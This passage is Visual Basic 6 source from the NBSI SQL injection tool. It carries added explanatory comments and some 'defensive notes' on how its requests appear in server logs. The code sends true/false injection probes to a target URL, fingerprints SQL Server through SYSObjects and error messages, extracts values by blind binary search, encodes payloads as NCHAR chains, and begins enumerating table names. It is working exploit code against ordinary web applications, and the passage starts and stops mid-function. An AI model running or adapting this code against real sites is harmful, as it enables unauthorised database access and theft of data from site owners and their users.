Pos = InStr(ResultArray(1), "varchar")
If InStr(ResultArray(0), HTTP_500_INC) > 0 And Pos > 0 Then
Pos_CRLF = InStr(Pos, ResultArray(1), vbLf)
LineStr = Mid(ResultArray(1), Pos, Pos_CRLF - Pos)
If InStr(LineStr, " and user+char(124)") = 0 Then
FunDecide_Method = 21
Exit Function
End If
End If
ResultArray = CommonGetHTTPHeadAndBody(URL_Source & "%25' and user%2Bchar(124)>0 and '%25'='")
Pos = InStr(ResultArray(1), "varchar")
If InStr(ResultArray(0), HTTP_500_INC) > 0 And Pos > 0 Then
Pos_CRLF = InStr(Pos, ResultArray(1), vbLf)
LineStr = Mid(ResultArray(1), Pos, Pos_CRLF - Pos)
If InStr(LineStr, " and user+char(124)") = 0 Then
FunDecide_Method = 31
Exit Function
End If
End If
Inject_Method = FunInject_Method(URL_Source)
If Inject_Method = 0 Then
FunDecide_Method = 0
Else
FunDecide_Method = 1
OptInject_Method(Inject_Method - 1).Enabled = True
OptInject_Method(Inject_Method - 1).Value = True
End If
Exit Function
End Function
' Keyword-driven variant of the "decide method" step. Issues six probe requests
' against URL_Source -- three with an appended always-true condition (bare
' numeric, single-quoted string, percent-encoded "%"-wrapped string) and three
' with an always-false one -- and searches each response body for KeyWord.
' Returns 2 when KeyWord occurs in at least one true-probe body AND is absent
' from at least one false-probe body; otherwise 0.
' The two halves of the condition are evaluated independently (each is an Or over
' the three probe styles), so the true-side and false-side hits are not required
' to come from the same style.
' Defensive note: the suffixes are sent literally, so this step shows up in
' server logs as a burst of six requests to one resource that differ only in
' those suffixes.
' ResultNumTrue .. ResultSchFalse carry no Dim in this block; whether they are
' procedure-local or module-level cannot be determined from here.
Public Function FunDecide_Method_ByKeyword(ByVal URL_Source As String, ByVal KeyWord As String) As Integer
ResultNumTrue = CommonGetHTTPBody(URL_Source & " And 1=1")
ResultStrTrue = CommonGetHTTPBody(URL_Source & "' And ''='")
ResultSchTrue = CommonGetHTTPBody(URL_Source & "%25' And '%25'='")
ResultNumFalse = CommonGetHTTPBody(URL_Source & " And 1=2")
ResultStrFalse = CommonGetHTTPBody(URL_Source & "' And 'FALSE'=")
ResultSchFalse = CommonGetHTTPBody(URL_Source & "%25' And ''=")
' Any true-probe body containing KeyWord, and any false-probe body lacking it.
If (InStr(ResultNumTrue, KeyWord) > 0 Or InStr(ResultStrTrue, KeyWord) > 0 Or InStr(ResultSchTrue, KeyWord) > 0) And _
(InStr(ResultNumFalse, KeyWord) = 0 Or InStr(ResultStrFalse, KeyWord) = 0 Or InStr(ResultSchFalse, KeyWord) = 0) Then
FunDecide_Method_ByKeyword = 2
Else
FunDecide_Method_ByKeyword = 0
End If
End Function
'----------------------------------------------------------------------------------------------
' Step 2: Inject_Method
'----------------------------------------------------------------------------------------------
' Step 2: determine which of three suffix styles URL_Source reacts to, by
' fetching the response header of a true/false probe pair per style:
'   1 = bare numeric context     (" And 1=1" / " And 1=2")
'   2 = single-quoted string     ("' And 1=1 And ''='" / "' And 1=2 And ''='")
'   3 = "%"-wrapped string       ("%25' And 1=1 And '%25'='" / "%25' And 1=2 And '%25'='")
' A style is accepted when the true probe's header contains HTTP_200_INC and the
' false probe's header contains HTTP_500_INC (both constants are defined outside
' this block). Returns the first accepted style, or 0 when none match.
' Each pair costs two requests through CommonGetHTTPHead, so a complete miss is
' six requests. CommonGetHTTPHead returns "" after a swallowed error or when its
' control is busy, so a network failure here reads as "no match", not as an error.
' ResultTrue / ResultFalse carry no Dim in this block.
Public Function FunInject_Method(ByVal URL_Source As String) As Integer
' Default result: no style matched.
FunInject_Method = 0
ResultTrue = CommonGetHTTPHead(URL_Source & " And 1=1")
ResultFalse = CommonGetHTTPHead(URL_Source & " And 1=2")
If InStr(ResultTrue, HTTP_200_INC) > 0 And InStr(ResultFalse, HTTP_500_INC) > 0 Then
FunInject_Method = 1
Exit Function
End If
ResultTrue = CommonGetHTTPHead(URL_Source & "' And 1=1 And ''='")
ResultFalse = CommonGetHTTPHead(URL_Source & "' And 1=2 And ''='")
If InStr(ResultTrue, HTTP_200_INC) > 0 And InStr(ResultFalse, HTTP_500_INC) > 0 Then
FunInject_Method = 2
Exit Function
End If
ResultTrue = CommonGetHTTPHead(URL_Source & "%25' And 1=1 And '%25'='")
ResultFalse = CommonGetHTTPHead(URL_Source & "%25' And 1=2 And '%25'='")
If InStr(ResultTrue, HTTP_200_INC) > 0 And InStr(ResultFalse, HTTP_500_INC) > 0 Then
FunInject_Method = 3
Exit Function
End If
End Function
' Body-based counterpart of FunInject_Method: the same three true/false suffix
' pairs, but each probe fetches the response body and a style is accepted when
' the true body contains KeyWord and the false body does not.
' Returns 1, 2 or 3 for the first accepted style. No branch assigns a default, so
' when nothing matches the Integer result keeps VB's initial value of 0.
' Six body downloads in the worst case; CommonGetHTTPBody returns "" on a
' swallowed error, which here counts as "KeyWord absent".
' ResultTrue / ResultFalse carry no Dim in this block.
Public Function FunInject_Method_ByKeyword(ByVal URL_Source As String, ByVal KeyWord As String) As Integer
ResultTrue = CommonGetHTTPBody(URL_Source & " And 1=1")
ResultFalse = CommonGetHTTPBody(URL_Source & " And 1=2")
If (InStr(ResultTrue, KeyWord) > 0 And InStr(ResultFalse, KeyWord) = 0) Then
FunInject_Method_ByKeyword = 1
Exit Function
End If
ResultTrue = CommonGetHTTPBody(URL_Source & "' And 1=1 And ''='")
ResultFalse = CommonGetHTTPBody(URL_Source & "' And 1=2 And ''='")
If (InStr(ResultTrue, KeyWord) > 0 And InStr(ResultFalse, KeyWord) = 0) Then
FunInject_Method_ByKeyword = 2
Exit Function
End If
ResultTrue = CommonGetHTTPBody(URL_Source & "%25' And 1=1 And '%25'='")
ResultFalse = CommonGetHTTPBody(URL_Source & "%25' And 1=2 And '%25'='")
If (InStr(ResultTrue, KeyWord) > 0 And InStr(ResultFalse, KeyWord) = 0) Then
FunInject_Method_ByKeyword = 3
Exit Function
End If
End Function
'----------------------------------------------------------------------------------------------
' Step 3: Database_Type
'----------------------------------------------------------------------------------------------
' Step 3: classify the back end using two probes suffixed per Inject_Method
' (1 bare, 2 single-quoted, 3 "%"-wrapped), both referencing SYSObjects.
' Result codes:
'   1 = first probe's header contains HTTP_200_INC and the second probe's body
'       contains the substring "varchar"
'   2 = first probe's header contains HTTP_200_INC, second body has no "varchar"
'   3 = first probe's header lacks HTTP_200_INC (second probe is not sent)
' Decide_Method is accepted but never read in this body.
' If Inject_Method is outside 1..3, neither Result200 nor Result500 is assigned
' here and the InStr checks run on whatever those undeclared names already hold.
Public Function FunDatabase_Type(ByVal URL_Source As String, ByVal Decide_Method As Integer, ByVal Inject_Method As Integer) As Integer
If Inject_Method = 1 Then
Result200 = CommonGetHTTPHead(URL_Source & " And (Select Count(1) from SYSObjects)>0")
ElseIf Inject_Method = 2 Then
Result200 = CommonGetHTTPHead(URL_Source & "' And (Select Count(1) from SYSObjects)>0 And ''='")
ElseIf Inject_Method = 3 Then
Result200 = CommonGetHTTPHead(URL_Source & "%25' And (Select Count(1) from SYSObjects)>0 And '%25'='")
End If
If InStr(Result200, HTTP_200_INC) > 0 Then
' Second probe fetches the body; only the substring "varchar" is examined.
If Inject_Method = 1 Then
Result500 = CommonGetHTTPBody(URL_Source & " And (Select Top 1 char(65) from SYSObjects)>0")
ElseIf Inject_Method = 2 Then
Result500 = CommonGetHTTPBody(URL_Source & "' And (Select Top 1 char(65) from SYSObjects)>0 And ''='")
ElseIf Inject_Method = 3 Then
Result500 = CommonGetHTTPBody(URL_Source & "%25' And (Select Top 1 char(65) from SYSObjects)>0 And '%25'='")
End If
If InStr(Result500, "varchar") > 0 Then
FunDatabase_Type = 1
Else
FunDatabase_Type = 2
End If
Else
FunDatabase_Type = 3
End If
End Function
' Keyword-based counterpart of FunDatabase_Type: one body fetch with the
' SYSObjects Count(1) suffix chosen by Inject_Method, then
'   2 = KeyWord found in the body
'   3 = KeyWord not found
' This variant never returns 1. KeyWord is not a parameter here -- it is read
' from outside the procedure. Decide_Method is accepted but never read.
' With Inject_Method outside 1..3, Result200 (undeclared here) is not assigned
' and the check runs on its previous contents.
Public Function FunDatabase_Type_ByKeyword(ByVal URL_Source As String, ByVal Decide_Method As Integer, ByVal Inject_Method As Integer) As Integer
If Inject_Method = 1 Then
Result200 = CommonGetHTTPBody(URL_Source & " And (Select Count(1) from SYSObjects)>0")
ElseIf Inject_Method = 2 Then
Result200 = CommonGetHTTPBody(URL_Source & "' And (Select Count(1) from SYSObjects)>0 And ''='")
ElseIf Inject_Method = 3 Then
Result200 = CommonGetHTTPBody(URL_Source & "%25' And (Select Count(1) from SYSObjects)>0 And '%25'='")
End If
If (InStr(Result200, KeyWord) > 0) Then
FunDatabase_Type_ByKeyword = 2
Else
FunDatabase_Type_ByKeyword = 3
End If
End Function
' Yes/no oracle used by CommonGetChar: fetches URL_Check and reports whether the
' response "reads as true". With Decide_Method = 1 the header is fetched and
' searched for HTTP_200_INC; otherwise the body is fetched and searched for
' KeyWord. Decide_Method and KeyWord are read from outside this procedure.
' The function is declared As String but is assigned the Boolean produced by
' IIf, so the caller presumably receives the converted text "True"/"False"; the
' If at the call site converts it back. Return_Value and ResultTrue carry no
' Dim here. One request per call.
Private Function CommonCheckStr(ByVal URL_Check As String) As String
If Decide_Method = 1 Then
ResultTrue = CommonGetHTTPHead(URL_Check)
Return_Value = IIf(InStr(ResultTrue, HTTP_200_INC) > 0, True, False)
Else
ResultTrue = CommonGetHTTPBody(URL_Check)
Return_Value = IIf(InStr(ResultTrue, KeyWord) > 0, True, False)
End If
CommonCheckStr = Return_Value
End Function
' Binary search over the integer range [MinV, MaxV] with CommonCheckStr as the
' oracle. Every iteration sends one request for
'   URL_Check & ">" & AvgV & URL_Check_End
' and keeps the upper half when the oracle says true (MinV = AvgV + 1), the
' lower half otherwise (MaxV = AvgV). It stops when MaxV is exactly one above
' the midpoint, returning MaxV if that last oracle was true, else AvgV.
' URL_Check_End is read from outside this procedure. MinV and MaxV are untyped
' and passed ByRef (VB default), so the caller's variables are narrowed in
' place. The result is declared As String but receives a number; VB converts.
' Termination depends on MaxV - MinV >= 1 on entry: with MinV = MaxV the
' midpoint equals MaxV, MaxV - AvgV is 0 on both branches, and the loop spins --
' each spin costing another request. Confirm callers never pass an empty range.
' Defensive note: one value costs about log2(MaxV - MinV) requests that differ
' only in the compared number, a recognisable sequence in access logs.
Private Function CommonGetChar(ByVal URL_Check As String, MinV, MaxV) As String
Do While True
AvgV = Int((MaxV + MinV) / 2)
If CommonCheckStr(URL_Check & ">" & CStr(AvgV) & URL_Check_End) Then
' Value is above AvgV; finished when only MaxV is left above it.
If MaxV - AvgV = 1 Then
CommonGetChar = MaxV
Exit Do
End If
MinV = AvgV + 1
Else
' Value is AvgV or below; finished when the gap has closed to one.
If MaxV - AvgV = 1 Then
CommonGetChar = AvgV
Exit Do
End If
MaxV = AvgV
End If
Loop
End Function
'----------------------------------------------------------------------------------------------
' Get Result by URL
'----------------------------------------------------------------------------------------------
' Inet-control event. Once the control reports a completed response, capture a
' single GetChunk of up to 102400 bytes of the body and the raw header into
' ReturnBody / ReturnHead, which the POST branches of CommonGetHTTPBody and
' CommonGetHTTPHeadAndBody poll for. Every other state change is ignored.
Private Sub iNet_StateChanged(ByVal State As Integer)
' Nothing to capture until the response is complete.
If State <> icResponseCompleted Then Exit Sub
ReturnBody = iNet.GetChunk(102400)
ReturnHead = iNet.GetHeader
End Sub
' Fetches only the response header for URL_Check through the iNet2 control and
' returns it as a String; callers decide by searching it for HTTP_200_INC /
' HTTP_500_INC. Also prepends URL_Check to Progress.Text and advances
' ProgressBar by 10, wrapping back to 10 once it has reached 100.
' Request shape depends on the MethodGet option button:
'   GET  -> a HEAD request for the full URL
'   POST -> the URL is split at its last "&" (or at "?" when there is no "&");
'           the part before becomes the POST URL and the remainder the form body,
'           with spaces rewritten to %20, sent as application/x-www-form-urlencoded
' Both branches busy-wait (Do While True / DoEvents) until the control reports it
' is no longer executing. There is no timeout, so an unanswered request keeps the
' UI pumping events indefinitely.
' On Error Resume Next is in force up to "On Error GoTo 0", so any control error
' leaves the result "" and the caller sees neither marker -- a failure is
' indistinguishable from a non-matching header. The busy-control path shows a
' message box and likewise returns "".
' Pos, PosAnd, PostURL and PostPara carry no Dim here; when URL_Check has
' neither "&" nor "?", PostURL and PostPara are not assigned in this call.
Public Function CommonGetHTTPHead(ByVal URL_Check As String) As String
On Error Resume Next
If iNet2.StillExecuting Then
Call MsgBox("上次的检测仍在执行中,请稍后再试!", 48, "NBSI提示信息")
Exit Function
End If
If MethodGet.Value = True Then
' Header-only request; the result is the raw header text.
iNet2.Execute (URL_Check), "HEAD"
Do While True
DoEvents
If Not iNet2.StillExecuting Then
CommonGetHTTPHead = iNet2.GetHeader
Exit Do
End If
Loop
Else
' Only the text after the last "&" (else after "?") is sent as the POST body.
Pos = InStr(URL_Check, "?")
PosAnd = InStrRev(URL_Check, "&")
If PosAnd > 0 Then
PostURL = Left(URL_Check, PosAnd - 1)
PostPara = Mid(URL_Check, PosAnd + 1)
ElseIf Pos > 0 Then
PostURL = Left(URL_Check, Pos - 1)
PostPara = Mid(URL_Check, Pos + 1)
End If
PostPara = Replace(PostPara, " ", "%20")
iNet2.Execute CStr(PostURL), "Post", CStr(PostPara), "Content-Type: application/x-www-form-urlencoded"
Do While True
DoEvents
If Not iNet2.StillExecuting Then
CommonGetHTTPHead = iNet2.GetHeader
Exit Do
End If
Loop
End If
On Error GoTo 0
' UI bookkeeping: newest URL on top; Progress.Text grows with every request.
Progress.Text = URL_Check & vbCrLf & Progress.Text
ProgressBar.Value = IIf(ProgressBar.Value >= 100, 10, ProgressBar.Value + 10)
End Function
' Fetches the response body for URL_Check through the iNet control and returns
' it as a String. Also prepends URL_Check to Progress.Text and advances
' ProgressBar by 10, wrapping back to 10 once it has reached 100.
'   GET  -> synchronous iNet.OpenURL of the full URL
'   POST -> URL split at its last "&" (or at "?" when there is no "&"); the
'           remainder, with spaces rewritten to %20, is posted as
'           application/x-www-form-urlencoded, and the body is taken from
'           ReturnBody, which iNet_StateChanged fills on icResponseCompleted
' The POST wait loop exits only when ReturnBody > "" AND the control is idle, so
' a response with an empty body never satisfies it and the loop spins with no
' timeout; the same holds for any request that never completes.
' The first loop already waits until the control is idle, so the StillExecuting
' check right after it can only fire if the state flips in between.
' On Error Resume Next is in force up to "On Error GoTo 0": a control error
' leaves the result "" and callers treat that as "keyword absent".
' Pos, PosAnd, PostURL and PostPara carry no Dim here; when URL_Check has
' neither "&" nor "?", PostURL and PostPara are not assigned in this call.
Public Function CommonGetHTTPBody(ByVal URL_Check As String) As String
On Error Resume Next
' Clear the buffer the StateChanged handler writes into.
ReturnBody = ""
Do While True
DoEvents
If Not iNet.StillExecuting Then Exit Do
Loop
If iNet.StillExecuting Then
Call MsgBox("上次的检测仍在执行中,请稍后再试!", 48, "NBSI提示信息")
Exit Function
End If
If MethodGet.Value = True Then
CommonGetHTTPBody = iNet.OpenURL(URL_Check)
Else
' Only the text after the last "&" (else after "?") is sent as the POST body.
Pos = InStr(URL_Check, "?")
PosAnd = InStrRev(URL_Check, "&")
If PosAnd > 0 Then
PostURL = Left(URL_Check, PosAnd - 1)
PostPara = Mid(URL_Check, PosAnd + 1)
ElseIf Pos > 0 Then
PostURL = Left(URL_Check, Pos - 1)
PostPara = Mid(URL_Check, Pos + 1)
End If
PostPara = Replace(PostPara, " ", "%20")
iNet.Execute CStr(PostURL), "Post", CStr(PostPara), "Content-Type: application/x-www-form-urlencoded"
Do While True
DoEvents
' Requires a non-empty body; an empty response keeps this loop running.
If ReturnBody > "" And Not iNet.StillExecuting Then
CommonGetHTTPBody = ReturnBody
Exit Do
End If
Loop
End If
On Error GoTo 0
' UI bookkeeping: newest URL on top; Progress.Text grows with every request.
Progress.Text = URL_Check & vbCrLf & Progress.Text
ProgressBar.Value = IIf(ProgressBar.Value >= 100, 10, ProgressBar.Value + 10)
End Function
' Fetches URL_Check through the iNet control and returns a two-element Variant
' array: element 0 is the response header, element 1 the body (callers index
' ResultArray(0) / ResultArray(1)). Also prepends URL_Check to Progress.Text and
' advances ProgressBar by 10, wrapping back to 10 once it has reached 100.
'   GET  -> synchronous iNet.OpenURL, then iNet.GetHeader
'   POST -> URL split at its last "&" (or at "?" when there is no "&"); the
'           remainder, spaces rewritten to %20, posted as
'           application/x-www-form-urlencoded; header and body are taken from
'           ReturnHead / ReturnBody, which iNet_StateChanged fills
' The POST wait loop exits only when both ReturnBody and ReturnHead are
' non-empty AND the control is idle, so an empty body or header keeps it
' spinning; there is no timeout.
' The busy-control path exits before HTTPArray is built, so in that case the
' Variant result is Empty rather than an array and a caller indexing it will
' error. On Error Resume Next is in force up to "On Error GoTo 0", so a control
' error yields an array of empty strings instead.
' HTTPHead, HTTPBody, Pos, PosAnd, PostURL and PostPara carry no Dim here.
Public Function CommonGetHTTPHeadAndBody(ByVal URL_Check As String) As Variant
On Error Resume Next
' Clear the buffers the StateChanged handler writes into.
ReturnBody = ""
ReturnHead = ""
Do While True
DoEvents
If Not iNet.StillExecuting Then Exit Do
Loop
If iNet.StillExecuting Then
Call MsgBox("上次的检测仍在执行中,请稍后再试!", 48, "NBSI提示信息")
Exit Function
End If
If MethodGet.Value = True Then
HTTPBody = iNet.OpenURL(URL_Check)
HTTPHead = iNet.GetHeader
Else
' Only the text after the last "&" (else after "?") is sent as the POST body.
Pos = InStr(URL_Check, "?")
PosAnd = InStrRev(URL_Check, "&")
If PosAnd > 0 Then
PostURL = Left(URL_Check, PosAnd - 1)
PostPara = Mid(URL_Check, PosAnd + 1)
ElseIf Pos > 0 Then
PostURL = Left(URL_Check, Pos - 1)
PostPara = Mid(URL_Check, Pos + 1)
End If
PostPara = Replace(PostPara, " ", "%20")
iNet.Execute CStr(PostURL), "Post", CStr(PostPara), "Content-Type: application/x-www-form-urlencoded"
Do While True
DoEvents
' Requires both header and body to be non-empty before returning.
If ReturnBody > "" And ReturnHead > "" And Not iNet.StillExecuting Then
HTTPBody = ReturnBody
HTTPHead = ReturnHead
Exit Do
End If
Loop
End If
' (0) header, (1) body.
Dim HTTPArray(1)
HTTPArray(0) = HTTPHead
HTTPArray(1) = HTTPBody
CommonGetHTTPHeadAndBody = HTTPArray
On Error GoTo 0
' UI bookkeeping: newest URL on top; Progress.Text grows with every request.
Progress.Text = URL_Check & vbCrLf & Progress.Text
ProgressBar.Value = IIf(ProgressBar.Value >= 100, 10, ProgressBar.Value + 10)
End Function
' Percent-encodes strInput one character at a time: ASCII digits and letters
' (0-9, A-Z, a-z) pass through unchanged; every other character becomes "%"
' followed by the upper-case hex of its Asc value, zero-padded to two digits
' when the value is below 16.
' Assumes single-byte characters: Asc returns values outside 0..255 for DBCS
' input, and Hex$ of such a value is wider than two digits, so the output for
' non-ASCII text is not well-formed %XX encoding -- confirm whether callers
' ever pass such text.
' i, intAscii and strOutput carry no Dim here. Without Option Explicit they
' are procedure-local Variants, but if a module-level strOutput exists the
' output would accumulate across calls -- confirm against the declarations
' section.
Public Function URLEncode(ByVal strInput As String) As String
For i = 1 To Len(strInput)
intAscii = Asc(Mid(strInput, i, 1))
' Unreserved alphanumerics are copied; everything else is %-escaped.
If (intAscii < 58 And intAscii > 47) Or (intAscii < 91 And intAscii > 64) Or (intAscii < 123 And intAscii > 96) Then
strOutput = strOutput & Chr$(intAscii)
Else
strOutput = strOutput & IIf(intAscii < 16, "%0", "%") & Trim$(Hex$(intAscii))
End If
Next
URLEncode = strOutput
End Function
' Rewrites strInput as a chain of NCHAR(code) terms joined by "%2B" (a
' percent-encoded "+"); constructed example: "ab" -> "NCHAR(97)%2BNCHAR(98)".
' Returns "" for empty input (the early Exit leaves the String result at its
' default). Codes come from AscW, i.e. UTF-16 code units; VB6's AscW returns a
' signed Integer, so units >= &H8000 come out negative -- confirm whether such
' input occurs.
' Defensive note: a run of NCHAR(n)%2BNCHAR(n) inside a query parameter is a
' distinctive string to look for in access logs.
' i, intAscii and strOutput carry no Dim here (same caveat as URLEncode: a
' module-level strOutput would accumulate across calls).
Public Function SQLUnicode(ByVal strInput As String) As String
If strInput = "" Then Exit Function
For i = 1 To Len(strInput)
intAscii = AscW(Mid(strInput, i, 1))
strOutput = strOutput & "NCHAR(" & intAscii & ")%2B"
Next
' Drop the trailing "%2B" (three characters) left by the last iteration.
SQLUnicode = Left(strOutput, Len(strOutput) - 3)
End Function
'----------------------------------------------------------------------------------------------
' Step 4: TableName
'----------------------------------------------------------------------------------------------
Private Function FunGet_TableName(ByVal URL_Source As String) As String
If Database_Type = 1 Then
Do While True
TableNO = TableNO + 1
If Inject_Method = 1 Then
URL_Check = URL_Source & " And (Select Top 1 cast(name as varchar(8000)) from(Select Top " & TableNO & " id,name from sysobjects Where xtype=char(85) order by id) T order by id desc)>0"
ElseIf Inject_Method = 2 Then
URL_Check = URL_Source &